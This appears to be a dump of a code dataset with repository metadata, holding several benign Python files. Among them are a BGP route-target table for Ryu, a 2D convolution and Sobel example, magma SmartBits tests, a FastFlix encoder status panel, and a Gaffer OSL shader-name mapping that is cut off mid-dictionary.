max_stars_repo_path
stringlengths
4
245
max_stars_repo_name
stringlengths
7
115
max_stars_count
int64
101
368k
id
stringlengths
2
8
content
stringlengths
6
1.03M
examples_and_tutorials/grid/heuristic_perception.py
ali-senguel/fairo
669
12685874
from droidlet.memory.memory_nodes import PlayerNode class HeuristicPerception: def __init__(self, agent): self.agent = agent def perceive(self): bots = self.agent.world.get_bots() for bot in bots: # print(f"[Perception INFO]: Perceived bot [{bot.name}] in the world, update in memory]") bot_node = self.agent.memory.get_player_by_eid(bot.entityId) if bot_node is None: memid = PlayerNode.create(self.agent.memory, bot) bot_node = PlayerNode(self.agent.memory, memid) self.agent.memory.tag(memid, "bot") bot_node.update(self.agent.memory, bot, bot_node.memid) print( f"[Memory INFO]: update bot [{bot.name}] position: ({bot.pos.x}, {bot.pos.y}, {bot.pos.z})" ) bot_memids = self.agent.memory.get_memids_by_tag("bot") bots_in_world = [b.entityId for b in bots] for memid in bot_memids: bot_eid = self.agent.memory.get_mem_by_id(memid).eid if bot_eid not in bots_in_world: self.agent.memory.forget(memid) print(f"[Memory INFO]: delete bot [{bot_eid}] from memory")
ryu/services/protocols/bgp/info_base/rtc.py
w180112/ryu
975
12685879
# Copyright (C) 2014 Nippon Telegraph and Telephone Corporation. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or # implied. # See the License for the specific language governing permissions and # limitations under the License. """ Defines data types and models required specifically for RTC support. """ import logging from ryu.lib.packet.bgp import RF_RTC_UC from ryu.services.protocols.bgp.info_base.base import Destination from ryu.services.protocols.bgp.info_base.base import NonVrfPathProcessingMixin from ryu.services.protocols.bgp.info_base.base import Path from ryu.services.protocols.bgp.info_base.base import Table LOG = logging.getLogger('bgpspeaker.info_base.rtc') class RtcTable(Table): """Global table to store RT membership information. Uses `RtDest` to store destination information for each known RT NLRI path. """ ROUTE_FAMILY = RF_RTC_UC def __init__(self, core_service, signal_bus): Table.__init__(self, None, core_service, signal_bus) def _table_key(self, rtc_nlri): """Return a key that will uniquely identify this RT NLRI inside this table. """ return str(rtc_nlri.origin_as) + ':' + rtc_nlri.route_target def _create_dest(self, nlri): return RtcDest(self, nlri) def __str__(self): return 'RtcTable(scope_id: %s, rf: %s)' % (self.scope_id, self.route_family) class RtcDest(Destination, NonVrfPathProcessingMixin): ROUTE_FAMILY = RF_RTC_UC def _new_best_path(self, new_best_path): NonVrfPathProcessingMixin._new_best_path(self, new_best_path) def _best_path_lost(self): NonVrfPathProcessingMixin._best_path_lost(self) class RtcPath(Path): ROUTE_FAMILY = RF_RTC_UC def __init__(self, source, nlri, src_ver_num, pattrs=None, nexthop='0.0.0.0', is_withdraw=False, med_set_by_target_neighbor=False): Path.__init__(self, source, nlri, src_ver_num, pattrs, nexthop, is_withdraw, med_set_by_target_neighbor)
txweb2/dav/test/test_options.py
backwardn/ccs-calendarserver
462
12685886
## # Copyright (c) 2005-2017 Apple Inc. All rights reserved. # # Permission is hereby granted, free of charge, to any person obtaining a copy # of this software and associated documentation files (the "Software"), to deal # in the Software without restriction, including without limitation the rights # to use, copy, modify, merge, publish, distribute, sublicense, and/or sell # copies of the Software, and to permit persons to whom the Software is # furnished to do so, subject to the following conditions: # # The above copyright notice and this permission notice shall be included in all # copies or substantial portions of the Software. # # THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR # IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, # FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE # AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER # LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, # OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE # SOFTWARE. # # DRI: <NAME>, <EMAIL> ## from txweb2.iweb import IResponse import txweb2.dav.test.util from txweb2.test.test_server import SimpleRequest class OPTIONS(txweb2.dav.test.util.TestCase): """ OPTIONS request """ def test_DAV1(self): """ DAV level 1 """ return self._test_level("1") def test_DAV2(self): """ DAV level 2 """ return self._test_level("2") test_DAV2.todo = "DAV level 2 unimplemented" def test_ACL(self): """ DAV ACL """ return self._test_level("access-control") def _test_level(self, level): def doTest(response): response = IResponse(response) dav = response.headers.getHeader("dav") if not dav: self.fail("no DAV header: %s" % (response.headers,)) self.assertIn(level, dav, "no DAV level %s header" % (level,)) return response return self.send(SimpleRequest(self.site, "OPTIONS", "/"), doTest)
DQMOffline/CalibCalo/python/MonitorAlCaEcalPhisym_cfi.py
ckamtsikis/cmssw
852
12685890
# The following comments couldn't be translated into the new config version: # prescale import FWCore.ParameterSet.Config as cms # # # \author <NAME> # EcalPhiSymMonDQM = cms.EDAnalyzer("HLTAlCaMonEcalPhiSym", # product to monitor AlCaStreamEBTag = cms.untracked.InputTag("hltAlCaPhiSymStream","phiSymEcalRecHitsEB"), SaveToFile = cms.untracked.bool(False), FileName = cms.untracked.string('MonitorAlCaEcalPhiSym.root'), AlCaStreamEETag = cms.untracked.InputTag("hltAlCaPhiSymStream","phiSymEcalRecHitsEE"), prescaleFactor = cms.untracked.int32(1), # DQM folder to write to FolderName = cms.untracked.string('AlCaReco/EcalPhiSym') )
usr/callbacks/next/next.py
uwitec/LEHome
151
12685915
<gh_stars>100-1000 #!/usr/bin/env python # encoding: utf-8 from lib.model import Callback class next_callback(Callback.Callback): def callback(self, action = None, target = None, msg = None, state = None, pre_value = None, pass_value = None): DEBUG("* next callback: action: %s, target: %s, message: %s state: %s pre_value: %s pass_value %s" %(action, target, msg, state, pre_value, pass_value)) return True, "pass"
contents/convolutions/2d/code/python/2d_convolution.py
alzawad26/algorithm-archive
1,975
12685963
<reponame>alzawad26/algorithm-archive import numpy as np from contextlib import suppress def convolve_linear(signal, filter, output_size): out = np.zeros(output_size) sum = 0 for i in range(output_size[0]): for j in range(output_size[1]): for k in range(max(0, i-filter.shape[0]), i+1): for l in range(max(0, j-filter.shape[1]), j+1): with suppress(IndexError): sum += signal[k, l] * filter[i-k, j-l] out[i, j] = sum sum = 0 return out def create_gaussian_kernel(kernel_size): kernel = np.zeros((kernel_size, kernel_size)) # The center must be offset by 0.5 to find the correct index center = kernel_size*0.5 + 0.5 sigma = np.sqrt(0.1*kernel_size) def kernel_function(x, y): return np.exp(-((x-center+1)**2 + (y-center+1)**2)/(2*sigma**2)) kernel = np.fromfunction(kernel_function, (kernel_size, kernel_size)) return kernel / np.linalg.norm(kernel) def create_sobel_operators(): Sx = np.dot([[1.0], [2.0], [1.0]], [[-1.0, 0.0, 1.0]]) / 9 Sy = np.dot([[-1.0], [0.0], [1.0]], [[1.0, 2.0, 1.0]]) / 9 return Sx, Sy def sum_matrix_dimensions(mat1, mat2): return (mat1.shape[0] + mat2.shape[0], mat1.shape[1] + mat2.shape[1]) def compute_sobel(signal): Sx, Sy = create_sobel_operators() Gx = convolve_linear(signal, Sx, sum_matrix_dimensions(signal, Sx)) Gy = convolve_linear(signal, Sy, sum_matrix_dimensions(signal, Sy)) return np.sqrt(np.power(Gx, 2) + np.power(Gy, 2)) def create_circle(image_resolution, grid_extents, radius): out = np.zeros((image_resolution, image_resolution)) for i in range(image_resolution): x_position = ((i * grid_extents / image_resolution) - 0.5 * grid_extents) for j in range(image_resolution): y_position = ((j * grid_extents / image_resolution) - 0.5 * grid_extents) if x_position ** 2 + y_position ** 2 <= radius ** 2: out[i, j] = 1.0 return out def main(): # Random distribution in x x = np.random.rand(100, 100) # Gaussian signals def create_gaussian_signals(i, j): return np.exp(-(((i-50)/100) ** 2 + ((j-50)/100) ** 2) / .01) y = np.fromfunction(create_gaussian_signals, (100, 100)) # Normalization is not strictly necessary, but good practice x /= np.linalg.norm(x) y /= np.linalg.norm(y) # full convolution, output will be the size of x + y full_linear_output = convolve_linear(x, y, sum_matrix_dimensions(x, y)) # simple boundaries simple_linear_output = convolve_linear(x, y, x.shape) np.savetxt("full_linear.dat", full_linear_output) np.savetxt("simple_linear.dat", simple_linear_output) # creating simple circle and 2 different Gaussian kernels circle = create_circle(50, 2, 0.5) circle = circle / np.linalg.norm(circle) small_kernel = create_gaussian_kernel(3) large_kernel = create_gaussian_kernel(25) small_kernel_output = convolve_linear(circle, small_kernel, sum_matrix_dimensions(circle, small_kernel)) large_kernel_output = convolve_linear(circle, large_kernel, sum_matrix_dimensions(circle, large_kernel)) np.savetxt("small_kernel.dat", small_kernel_output) np.savetxt("large_kernel.dat", large_kernel_output) circle = create_circle(50, 2, 0.5) # Normalization circle = circle / np.linalg.norm(circle) # using the circle for sobel operations as well sobel_output = compute_sobel(circle) np.savetxt("sobel_output.dat", sobel_output)
configs/seg/_base_/schedules/schedule_adamw_80k.py
yinchimaoliang/K-Net
361
12685979
# optimizer optimizer = dict(type='AdamW', lr=0.0001, weight_decay=0.0005) optimizer_config = dict(grad_clip=dict(max_norm=1, norm_type=2)) # learning policy lr_config = dict( policy='step', warmup='linear', warmup_iters=1000, warmup_ratio=0.001, step=[60000, 72000], by_epoch=False) # runtime settings runner = dict(type='IterBasedRunner', max_iters=80000) checkpoint_config = dict(by_epoch=False, interval=8000) evaluation = dict(interval=8000, metric='mIoU')
examples/YOLOv3_Training.py
KerasKorea/YOLK_ObjectDetector
124
12685990
from keras.optimizers import Adam from keras_yolov3.train import get_anchors, get_classes, data_generator_wrapper from keras_yolov3.yolov3_class import YOLOv3 import tensorflow as tf config = tf.ConfigProto() config.gpu_options.allow_growth = True sess = tf.Session(config=config) classes_path = '../keras_yolov3/model_data/coco_classes.txt' anchors_path = '../keras_yolov3/model_data/yolo_anchors.txt' class_names = get_classes(classes_path) num_classes = len(class_names) anchors = get_anchors(anchors_path) num_anchors = len(anchors) yolov3 = YOLOv3(anchors, num_classes) model_path = '../keras_yolov3/model_data/yolo_weights.h5' yolov3.model.load_weights(model_path, by_name=True, skip_mismatch=True) annotation_path = '../keras_yolov3/model_data/train.txt' with open(annotation_path) as f: lines = f.readlines() num_train = len(lines) batch_size = 32 yolov3.model.compile(optimizer=Adam(lr=1e-3), loss={'yolo_loss': lambda y_true, y_pred: y_pred}) yolov3.model.fit_generator(data_generator_wrapper(lines, batch_size, yolov3.input_shape, anchors, num_classes), steps_per_epoch=max(1, num_train // batch_size), epochs=50, initial_epoch=0)
tests/test_smart/test_smart_bits.py
leonardt/magma
167
12686036
<reponame>leonardt/magma from functools import wraps, partial import operator import pytest import magma as m from magma.smart import SmartBit, SmartBits, concat, signed, make_smart from magma.testing import check_files_equal def _run_test(func=None, *, skip_check=False): if func is None: return partial(_run_test, skip_check=skip_check) @wraps(func) def _wrapper(*args, **kwargs): name = func.__name__ ckt = func(*args, **kwargs) m.compile(f"build/{name}", ckt, output="coreir-verilog", inline=True) build = f"build/{name}.v" gold = f"gold/{name}.v" if not skip_check: assert check_files_equal(__file__, build, gold) return _wrapper @_run_test def test_binop(): # Ops can be add, sub, mul, div, mod, and, or, xor. op = operator.add class _Test(m.Circuit): io = m.IO( I0=m.In(SmartBits[8]), I1=m.In(SmartBits[12]), O1=m.Out(SmartBits[8]), O2=m.Out(SmartBits[12]), O3=m.Out(SmartBits[16])) val = op(io.I0, io.I1) io.O1 @= val io.O2 @= val io.O3 @= val return _Test @_run_test def test_comparison(): # Ops can be eq, ne, ge, gt, le, lt. op = operator.eq class _Test(m.Circuit): io = m.IO( I0=m.In(SmartBits[8]), I1=m.In(SmartBits[12]), O1=m.Out(SmartBits[1]), O2=m.Out(SmartBits[16])) val = op(io.I0, io.I1) io.O1 @= val io.O2 @= val return _Test @_run_test def test_lshift(): class _Test(m.Circuit): io = m.IO( I0=m.In(SmartBits[8]), I1=m.In(SmartBits[4]), O1=m.Out(SmartBits[8]), O2=m.Out(SmartBits[16])) val = io.I0 << io.I1 io.O1 @= val io.O2 @= val return _Test @_run_test def test_rshift(): class _Test(m.Circuit): io = m.IO( I0=m.In(SmartBits[8]), I1=m.In(SmartBits[4]), O1=m.Out(SmartBits[4]), O2=m.Out(SmartBits[8]), O3=m.Out(SmartBits[16])) val = io.I0 >> io.I1 io.O1 @= val io.O2 @= val io.O3 @= val return _Test @_run_test def test_concat(): class _Test(m.Circuit): io = m.IO( I0=m.In(SmartBits[8]), I1=m.In(SmartBits[4]), I2=m.In(SmartBits[10]), O1=m.Out(SmartBits[4]), O2=m.Out(SmartBits[16])) val = concat(io.I0 + io.I1, io.I2) io.O1 @= val io.O2 @= val return _Test @_run_test def test_unary(): # Ops can be invert, neg. op = operator.invert class _Test(m.Circuit): io = m.IO( I0=m.In(SmartBits[8]), O1=m.Out(SmartBits[4]), O2=m.Out(SmartBits[16])) val = op(io.I0) io.O1 @= val io.O2 @= val return _Test @_run_test def test_reduction(): # Ops can be and, or, xor. op = operator.and_ class _Test(m.Circuit): io = m.IO( I0=m.In(SmartBits[8]), O1=m.Out(SmartBits[1]), O2=m.Out(SmartBits[16])) val = io.I0.reduce(op) io.O1 @= val io.O2 @= val return _Test @_run_test def test_smoke(): # NOTE(rsetaluri): We use a CircuitBuilder here just so we can dynamically # add ports to make the test specification easier. The test just creates a # bunch of SmartBits values and does operations and wires them. This is # easiest to do and check in the context of a circuit definition. It is also # (mostly) possible to do them on anonymous values but is less convenient. class _Test(m.CircuitBuilder): def __init__(self, name): super().__init__(name) self._counter = 0 def fresh_name(self): name = f"port{self._counter}" self._counter += 1 return name def make_ports(self, *widths): assert len(widths) >= 2 names = [] for i, width in enumerate(widths): name = self.fresh_name() width = widths[i] T = SmartBit if width is None else SmartBits[width] dir_ = m.Out if i == 0 else m.In self._add_port(name, dir_(T)) names.append(name) return [self._port(name) for name in names] @m.builder_method def _finalize(self): # Any Smart<x> can be wired to any Smart<y>. x, y = self.make_ports(10, 16) x @= y # truncate y y, x = self.make_ports(16, 10) y @= x # extend x x, z = self.make_ports(10, None) x @= z # extend z z, x = self.make_ports(None, 10) z @= x # truncate x # Any Smart<x> (op) Smart<y> is valid; each (op) has its own width # rules. # Arithmetic and logic. out, x, y = self.make_ports(12, 10, 16) out @= x + y # width = max(12, 10, 16); op: +, -, *, /, %, &, |, ^ out, x, z = self.make_ports(None, 10, None) out @= x + z # width = max(1, 10, 1) out, x = self.make_ports(16, 10) out @= ~x # width = max(16, 10); ~ # Comparison. out, x, y = self.make_ports(12, 10, 16) out @= x <= y # width = 1; op: ==, !=, <, <=, >, >= # Reductiton. out, x = self.make_ports(4, 10) out @= x.reduce(operator.and_) # width = 1; op: &, |, ^ # Shifting. out, x, y = self.make_ports(10, 10, 16) out @= x << y # extend x, truncate output; width = 10; op: <<, >> out, x, y = self.make_ports(16, 10, 16) out @= y << x # extend x; width = 16 out, x, z = self.make_ports(10, 10, None) out @= x << z # extend z; width = 10 out, x, z = self.make_ports(None, 10, None) out @= z << x # extend z, truncate output; width = 1 # Concat. out, x, y, z = self.make_ports(32, 10, 16, None) out @= concat(x, y, z) # extend concat; width = 10 + 16 + 1 = 27. class _TestTop(m.Circuit): inst = _Test(name="Test") return type(_TestTop.instances[0]) @_run_test def test_complex(): class _Test(m.Circuit): io = m.IO( I0=m.In(SmartBits[7]), I1=m.In(SmartBits[9, True]), I2=m.In(SmartBits[12, True]), O=m.Out(SmartBits[10]), O2=m.Out(SmartBits[7]), O3=m.Out(SmartBit), ) x = (~(io.I0 + io.I1) + io.I2) << io.I0.reduce(operator.and_) y = signed(io.I1 <= io.I2) + signed(io.I0) io.O @= x io.O2 @= y io.O3 @= io.I0 EXPECTED = ("lshift(add(invert(add(Extend[width=5, " "signed=False](SmartBits[7, False](I0)), Extend[width=3, " "signed=False](SmartBits[9, True](I1)))), SmartBits[12, " "True](I2)), Extend[width=11, " "signed=False](AndReduce(SmartBits[7, False](I0))))") assert str(_Test.io.O._smart_expr_) == EXPECTED return _Test def test_type_constructors(): T1 = SmartBits[8] assert T1._T is m.Bits[8] assert T1._signed == False T2 = SmartBits[12, True] assert T2._T is m.Bits[12] assert T2._signed == True with pytest.raises(TypeError) as pytest_e: T3 = SmartBits[8][12] assert False args = pytest_e.value.args assert args == ("Can not doubly qualify SmartBits, i.e. " "SmartBits[n][m] not allowed",) @_run_test(skip_check=True) def test_unsigned_add(): class _Test(m.Circuit): io = m.IO( x=m.In(SmartBits[8, True]), y=m.In(SmartBits[16, False]), O=m.Out(SmartBits[20, True]) ) io.O @= io.x + io.y return _Test def test_make_smart(): class _T(m.Product): x = m.Bits[8] y = m.Array[10, m.Bits[16]] # Value should be non-anonymous so that the value checks below work. value = _T(name="value") smart = make_smart(value) # Type checks. assert isinstance(smart, m.Tuple) assert set(type(smart).field_dict.keys()) == {"x", "y"} assert isinstance(smart.x, SmartBits) assert len(smart.x) == 8 and type(smart.x)._signed == False assert isinstance(smart.y, m.Array) assert isinstance(smart.y[0], SmartBits) assert len(smart.y[0]) == 16 assert type(smart.y[0])._signed == False # Value checks. assert smart.x._get_magma_value_().value() is value.x for i in range(10): assert smart.y[i]._get_magma_value_().value() is value.y[i]
fastflix/widgets/panels/status_panel.py
ObviousInRetrospect/FastFlix
388
12686076
<reponame>ObviousInRetrospect/FastFlix #!/usr/bin/env python # -*- coding: utf-8 -*- import datetime import logging import time from datetime import timedelta from typing import Optional from PySide6 import QtCore, QtWidgets from fastflix.exceptions import FlixError from fastflix.language import t from fastflix.models.fastflix_app import FastFlixApp from fastflix.models.video import Video from fastflix.shared import time_to_number, timedelta_to_str logger = logging.getLogger("fastflix") class StatusPanel(QtWidgets.QWidget): speed = QtCore.Signal(str) bitrate = QtCore.Signal(str) nvencc_signal = QtCore.Signal(str) tick_signal = QtCore.Signal() def __init__(self, parent, app: FastFlixApp): super().__init__(parent) self.app = app self.main = parent.main self.current_video: Optional[Video] = None self.started_at = None self.ticker_thread = ElapsedTimeTicker(self, self.tick_signal) self.ticker_thread.start() layout = QtWidgets.QGridLayout() self.hide_nal = QtWidgets.QCheckBox(t("Hide NAL unit messages")) self.hide_nal.setChecked(True) self.eta_label = QtWidgets.QLabel(f"{t('Time Left')}: N/A") self.eta_label.setToolTip(t("Estimated time left for current command")) self.eta_label.setStyleSheet("QLabel{margin-right:50px}") self.time_elapsed_label = QtWidgets.QLabel(f"{t('Time Elapsed')}: N/A") self.time_elapsed_label.setStyleSheet("QLabel{margin-right:50px}") self.size_label = QtWidgets.QLabel(f"{t('Size Estimate')}: N/A") self.size_label.setToolTip(t("Estimated file size based on bitrate")) h_box = QtWidgets.QHBoxLayout() h_box.addWidget(QtWidgets.QLabel(t("Encoder Output")), alignment=QtCore.Qt.AlignLeft) h_box.addStretch(1) h_box.addWidget(self.eta_label) h_box.addWidget(self.time_elapsed_label) h_box.addWidget(self.size_label) h_box.addStretch(1) h_box.addWidget(self.hide_nal, alignment=QtCore.Qt.AlignRight) layout.addLayout(h_box, 0, 0) self.inner_widget = Logs(self, self.app, self.main, self.app.fastflix.log_queue) layout.addWidget(self.inner_widget, 1, 0) self.setLayout(layout) self.speed.connect(self.update_speed) self.bitrate.connect(self.update_bitrate) self.nvencc_signal.connect(self.update_nvencc) self.main.status_update_signal.connect(self.on_status_update) self.tick_signal.connect(self.update_time_elapsed) def cleanup(self): self.inner_widget.log_updater.terminate() self.ticker_thread.stop_signal.emit() self.ticker_thread.terminate() def get_movie_length(self): if not self.current_video: return 0 return ( self.current_video.video_settings.end_time or self.current_video.duration ) - self.current_video.video_settings.start_time def update_speed(self, combined): if not combined: self.eta_label.setText(f"{t('Time Left')}: N/A") return try: time_passed, speed = combined.split("|") if speed == "N/A": self.eta_label.setText(f"{t('Time Left')}: N/A") return time_passed = time_to_number(time_passed) speed = float(speed) if not speed: return assert speed > 0.0001, speed length = self.get_movie_length() if not length: return data = timedelta(seconds=(length - time_passed) // speed) except Exception: logger.exception("can't update size ETA") self.eta_label.setText(f"{t('Time Left')}: N/A") else: if not speed: self.eta_label.setText(f"{t('Time Left')}: N/A") self.eta_label.setText(f"{t('Time Left')}: {timedelta_to_str(data)}") def update_bitrate(self, bitrate): if not bitrate or bitrate.strip() == "N/A": self.size_label.setText(f"{t('Size Estimate')}: N/A") return try: bitrate, _ = bitrate.split("k", 1) bitrate = float(bitrate) size_eta = (self.get_movie_length() * bitrate) / 8000 except AttributeError: self.size_label.setText(f"{t('Size Estimate')}: N/A") except Exception: logger.exception(f"can't update bitrate: {bitrate} - length {self.get_movie_length()}") self.size_label.setText(f"{t('Size Estimate')}: N/A") else: if not size_eta: self.size_label.setText(f"{t('Size Estimate')}: N/A") self.size_label.setText(f"{t('Size Estimate')}: {size_eta:.2f}MB") def update_nvencc(self, raw_line): """ Example line: [53.1%] 19/35 frames: 150.57 fps, 5010 kb/s, remain 0:01:55, GPU 10%, VE 96%, VD 42%, est out size 920.6MB """ for section in raw_line.split(","): section = section.strip() if section.startswith("remain"): self.eta_label.setText(f"{t('Time Left')}: {section.rsplit(maxsplit=1)[1]}") elif section.startswith("est out size"): self.size_label.setText(f"{t('Size Estimate')}: {section.rsplit(maxsplit=1)[1]}") def update_time_elapsed(self): now = datetime.datetime.now(datetime.timezone.utc) if not self.started_at: logger.warning("Unable to update time elapsed because start time isn't set") return try: time_elapsed = now - self.started_at except Exception: logger.exception("Unable to calculate elapsed time") return self.time_elapsed_label.setText(f"{t('Time Elapsed')}: {timedelta_to_str(time_elapsed)}") def on_status_update(self): # If there was a status change, we need to restart ticker no matter what self.started_at = datetime.datetime.now(datetime.timezone.utc) def close(self): self.ticker_thread.terminate() super().close() class Logs(QtWidgets.QTextBrowser): log_signal = QtCore.Signal(str) clear_window = QtCore.Signal(str) timer_signal = QtCore.Signal(str) def __init__(self, parent, app: FastFlixApp, main, log_queue): super(Logs, self).__init__(parent) self.parent = parent self.app = app self.main = main self.status_panel = parent self.current_video = None self.log_signal.connect(self.update_text) self.clear_window.connect(self.blank) self.timer_signal.connect(self.timer_update) self.log_updater = LogUpdater(self, log_queue) self.log_updater.start() def update_text(self, msg): if self.status_panel.hide_nal.isChecked() and msg.endswith(("NAL unit 62", "NAL unit 63")): return if self.status_panel.hide_nal.isChecked() and msg.lstrip().startswith("Last message repeated"): return if msg.startswith("frame="): try: output = [] for i in (x.strip().split() for x in msg.split("=")): output.extend(i) frame = dict(zip(output[0::2], output[1::2])) self.status_panel.speed.emit(f"{frame.get('time', '')}|{frame.get('speed', '').rstrip('x')}") self.status_panel.bitrate.emit(frame.get("bitrate", "")) except Exception: pass elif "remain" in msg: self.status_panel.nvencc_signal.emit(msg) self.append(msg) def blank(self, data): _, video_uuid, command_uuid = data.split(":") try: self.parent.current_video = self.main.find_video(video_uuid) self.current_command = self.main.find_command(self.parent.current_video, command_uuid) except FlixError: logger.error(f"Couldn't find video or command for UUID {video_uuid}:{command_uuid}") self.parent.current_video = None self.current_command = None self.setText("") self.parent.started_at = datetime.datetime.now(datetime.timezone.utc) def timer_update(self, cmd): self.parent.ticker_thread.state_signal.emit(cmd == "START") def closeEvent(self, event): self.hide() class ElapsedTimeTicker(QtCore.QThread): state_signal = QtCore.Signal(bool) stop_signal = QtCore.Signal() # Clean exit of program def __init__(self, parent, tick_signal): super().__init__(parent) self.parent = parent self.tick_signal = tick_signal self.send_tick_signal = False self.stop_received = False self.state_signal.connect(self.set_state) self.stop_signal.connect(self.on_stop) def __del__(self): self.wait() def run(self): while not self.stop_received: time.sleep(0.5) if not self.send_tick_signal: continue self.tick_signal.emit() logger.debug("Ticker thread stopped") def set_state(self, state): self.send_tick_signal = state def on_stop(self): self.stop_received = True class LogUpdater(QtCore.QThread): def __init__(self, parent, log_queue): super().__init__(parent) self.parent = parent self.log_queue = log_queue def __del__(self): self.wait() def run(self): while True: msg = self.log_queue.get() if msg.startswith("CLEAR_WINDOW"): self.parent.clear_window.emit(msg) self.parent.timer_signal.emit("START") elif msg == "STOP_TIMER": self.parent.timer_signal.emit("STOP") elif msg == "UPDATE_QUEUE": self.parent.status_panel.main.video_options.update_queue(currently_encoding=self.parent.converting) else: self.parent.log_signal.emit(msg)
startup/GafferOSL/shaderNameCompatibility.py
ddesmond/gaffer
561
12686096
<filename>startup/GafferOSL/shaderNameCompatibility.py ########################################################################## # # Copyright (c) 2018, Image Engine Design Inc. All rights reserved. # # Redistribution and use in source and binary forms, with or without # modification, are permitted provided that the following conditions are # met: # # * Redistributions of source code must retain the above # copyright notice, this list of conditions and the following # disclaimer. # # * Redistributions in binary form must reproduce the above # copyright notice, this list of conditions and the following # disclaimer in the documentation and/or other materials provided with # the distribution. # # * Neither the name of <NAME> nor the names of # any other contributors to this software may be used to endorse or # promote products derived from this software without specific prior # written permission. # # THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS # IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, # THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR # PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR # CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, # EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, # PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR # PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF # LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING # NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS # SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. # ########################################################################## import GafferOSL __nameMapping = { "Utility/VectorToColor" : "Conversion/VectorToColor", "Utility/BuildColor" : "Conversion/FloatToColor", "Utility/SplitColor" : "Conversion/ColorToFloat", "Utility/BuildPoint" : "Conversion/FloatToVector", "Utility/SplitPoint" : "Conversion/VectorToFloat", "Maths/FloatMix" : "Maths/MixFloat", "Maths/VectorMix" : "Maths/MixVector", "Maths/FloatAdd" : "Maths/AddFloat", "Maths/FloatMultiply" : "Maths/MultiplyFloat", "Maths/VectorAdd" : "Maths/AddVector", "Maths/VectorMultiply" : "Maths/ScaleVector", # A whole bunch of MaterialX shaders were renamed from `mx_<op>_<type>` # to `mx_<op>_<type>_<type>` here : # # https://github.com/AcademySoftwareFoundation/OpenShadingLanguage/pull/909. # # It seems likely that this was a mistake, given that the equivalent # shaders in the MaterialX repo are just `mx_<op>_<type>`. But to # keep old scenes loading we have to do the conversion. If in future we # switch to the MaterialX implementation, we will just have to # reverse the renaming here. "MaterialX/mx_add_color" : "MaterialX/mx_add_color_color", "MaterialX/mx_add_color2" : "MaterialX/mx_add_color2_color2", "MaterialX/mx_add_color4" : "MaterialX/mx_add_color4_color4", "MaterialX/mx_add_float" : "MaterialX/mx_add_float_float", "MaterialX/mx_add_surfaceshader" : "MaterialX/mx_add_surfaceshader_surfaceshader", "MaterialX/mx_add_vector" : "MaterialX/mx_add_vector_vector", "MaterialX/mx_add_vector2" : "MaterialX/mx_add_vector2_vector2", "MaterialX/mx_add_vector4" : "MaterialX/mx_add_vector4_vector4", "MaterialX/mx_clamp_color" : "MaterialX/mx_clamp_color_color", "MaterialX/mx_clamp_color2" : "MaterialX/mx_clamp_color2_color2", "MaterialX/mx_clamp_color4" : "MaterialX/mx_clamp_color4_color4", "MaterialX/mx_clamp_float" : "MaterialX/mx_clamp_float_float", "MaterialX/mx_clamp_vector" : "MaterialX/mx_clamp_vector_vector", "MaterialX/mx_clamp_vector2" : "MaterialX/mx_clamp_vector2_vector2", "MaterialX/mx_clamp_vector4" : "MaterialX/mx_clamp_vector4_vector4", "MaterialX/mx_contrast_color" : "MaterialX/mx_contrast_color_color", "MaterialX/mx_contrast_color2" : "MaterialX/mx_contrast_color2_color2", "MaterialX/mx_contrast_color4" : "MaterialX/mx_contrast_color4_color4", "MaterialX/mx_contrast_float" : "MaterialX/mx_contrast_float_float", "MaterialX/mx_contrast_vector" : "MaterialX/mx_contrast_vector_vector", "MaterialX/mx_contrast_vector2" : "MaterialX/mx_contrast_vector2_vector2", "MaterialX/mx_contrast_vector4" : "MaterialX/mx_contrast_vector4_vector4", "MaterialX/mx_divide_color" : "MaterialX/mx_divide_color_color", "MaterialX/mx_divide_color2" : "MaterialX/mx_divide_color2_color2", "MaterialX/mx_divide_color4" : "MaterialX/mx_divide_color4_color4", "MaterialX/mx_divide_float" : "MaterialX/mx_divide_float_float", "MaterialX/mx_divide_vector" : "MaterialX/mx_divide_vector_vector", "MaterialX/mx_divide_vector2" : "MaterialX/mx_divide_vector2_vector2", "MaterialX/mx_divide_vector4" : "MaterialX/mx_divide_vector4_vector4", "MaterialX/mx_invert_color" : "MaterialX/mx_invert_color_color", "MaterialX/mx_invert_color2" : "MaterialX/mx_invert_color2_color2", "MaterialX/mx_invert_color4" : "MaterialX/mx_invert_color4_color4", "MaterialX/mx_invert_float" : "MaterialX/mx_invert_float_float", "MaterialX/mx_invert_vector" : "MaterialX/mx_invert_vector_vector", "MaterialX/mx_invert_vector2" : "MaterialX/mx_invert_vector2_vector2", "MaterialX/mx_invert_vector4" : "MaterialX/mx_invert_vector4_vector4", "MaterialX/mx_max_color" : "MaterialX/mx_max_color_color", "MaterialX/mx_max_color2" : "MaterialX/mx_max_color2_color2", "MaterialX/mx_max_color4" : "MaterialX/mx_max_color4_color4", "MaterialX/mx_max_float" : 